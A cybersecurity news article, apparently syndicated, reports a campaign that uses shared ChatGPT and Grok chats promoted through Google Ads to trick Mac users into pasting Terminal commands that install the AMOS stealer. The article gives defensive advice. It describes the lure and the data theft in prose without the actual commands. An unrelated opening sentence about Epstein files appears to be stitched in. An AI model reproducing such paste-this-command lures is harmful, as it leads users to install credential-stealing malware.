The release of more Jeffrey Epstein files reveals further connections between the late, convicted sex criminal and the state of Israel.

Cybercriminals have developed a sophisticated attack campaign that exploits user trust in artificial intelligence platforms to distribute the Atomic macOS Stealer (AMOS), marking a dangerous evolution in social engineering tactics. This new threat combines legitimate AI chatbot services from ChatGPT and Grok with paid Google advertising to lure unsuspecting Mac users into executing malicious terminal commands that compromise their systems. The campaign specifically targets individuals searching for common troubleshooting solutions, such as clearing disk space on macOS, redirecting them to seemingly authentic AI-generated instructions hosted on trusted domains. The attack method leverages a technique known as “ClickFix,” where users are tricked into manually running shell commands that download and install malware directly onto their devices. What makes this campaign particularly effective is its ability to bypass traditional security measures by appearing completely legitimate, as the malicious instructions are hosted on official ChatGPT and Grok websites rather than suspicious third-party domains. Once executed, the AMOS stealer immediately begins harvesting sensitive information including browser passwords, cryptocurrency wallet seed phrases, Keychain credentials, and personal files, transmitting everything to attacker-controlled servers. Flare analysts identified that attackers create shareable AI chat links containing step-by-step “installation guides” disguised as legitimate macOS troubleshooting instructions. These conversations are then promoted to the top of Google search results through paid advertising campaigns, ensuring maximum visibility when users search for common technical queries. The social engineering component proves remarkably effective because users inherently trust results appearing on reputable platforms like OpenAI and X.AI domains, combined with the additional credibility boost from appearing as sponsored Google search results. Attack Mechanism and Infection Chain The infection process begins when a Mac user conducts a routine Google search for troubleshooting assistance, such as “clear disk space on macOS” or similar technical queries. Sponsored advertisements or highly-ranked organic results direct victims to shared ChatGPT or Grok conversations that appear to offer helpful system maintenance guidance. These AI-generated conversations contain carefully crafted instructions that prompt users to open their Terminal application and paste what appears to be a harmless command. The malicious command downloads a script from an external domain controlled by the attackers, which then repeatedly requests the user’s system password under the guise of legitimate system operations. Once the correct credentials are provided, the script installs the AMOS infostealer along with a persistent backdoor that survives system reboots and provides long-term remote access to the compromised machine. The malware immediately targets cryptocurrency wallets including Electrum, Exodus, Coinbase, MetaMask, and Ledger Live, extracting seed phrases and private keys that enable immediate theft of digital assets. Additionally, AMOS harvests browser data from Chrome, Safari, and Firefox, including saved passwords, cookies, autofill information, and active login sessions. Organizations and individual Mac users should monitor for unsigned applications requesting system passwords, unusual Terminal activity, and unexpected network connections to unfamiliar domains. Security teams must educate users that instructions appearing on trusted AI platforms can be compromised through social engineering, and any guidance requesting Terminal command execution should be independently verified through official support channels before implementation. Follow us on  Google News ,  LinkedIn , and  X  to Get More Instant Updates ,  Set CSN as a Preferred Source in  Google . The post Threat Actors Weaponize ChatGPT, Grok and Leverages Google Ads to Distribute macOS AMOS Stealer appeared first on Cyber Security News .